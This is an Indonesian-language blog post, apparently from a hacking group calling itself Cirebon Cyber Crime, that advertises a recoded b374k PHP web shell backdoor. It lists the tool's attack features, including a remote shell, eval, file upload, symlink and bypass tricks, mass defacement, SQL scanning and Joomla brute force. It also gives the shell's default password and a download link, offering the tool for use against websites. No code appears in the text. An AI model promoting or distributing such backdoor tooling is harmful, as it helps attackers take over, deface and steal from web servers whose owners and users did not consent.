Alsaskar_Attacker Private Shell

01:08
Hallo Selamat Siang Sobat :)


Kali ini saya akan share shell Backdoor yang saya recode...
Shell ini awalnya dari B374k lalu kemudian saya Recode agar supaya terlihat tamvan :'v
Oke Langsung saja ya ^_^

Penampakkan Login nya dari Alsaskar_Attacker :'v



Sebelum masuk di shell saya,,,Gue akan kasih fitur" nya :'v

Nih Beberapa fitur terbaru :
*Shell
*Eval
*Upload
*Symlink
*Bypass
*CgiShell
*Mass Deface
*Phyton
*SQL Scan
*Script Encode ( Kalian bisa recode shell kalian disitu :'v )
*Config
*CMS Detector
*Mysql
*Joomla BrutForce
*Hash Id
*Respass

Dll deh pokoknya banyak...
Agar kalian tidak penasaran yuk lihat gambar di bawah ini :'v

Penampakkan :


Desscription :
Name : Alsaskar_Attacker Shell [ b374k Recode By Alsaskar_Attacker ]
File Zize : 340 .20 KB
Default Password : alsaskar_welcome_lord
Download : Click Here


Sekian dan terim kasih :)

Content Creator : Alsaskar Mirando Malalantang
                             Alsaskar_Attacker

Thanks To          : Crash Saster  :)

My Team            : Cirebon Cyber Crime

Artikel Terkait

Previous
Next Post »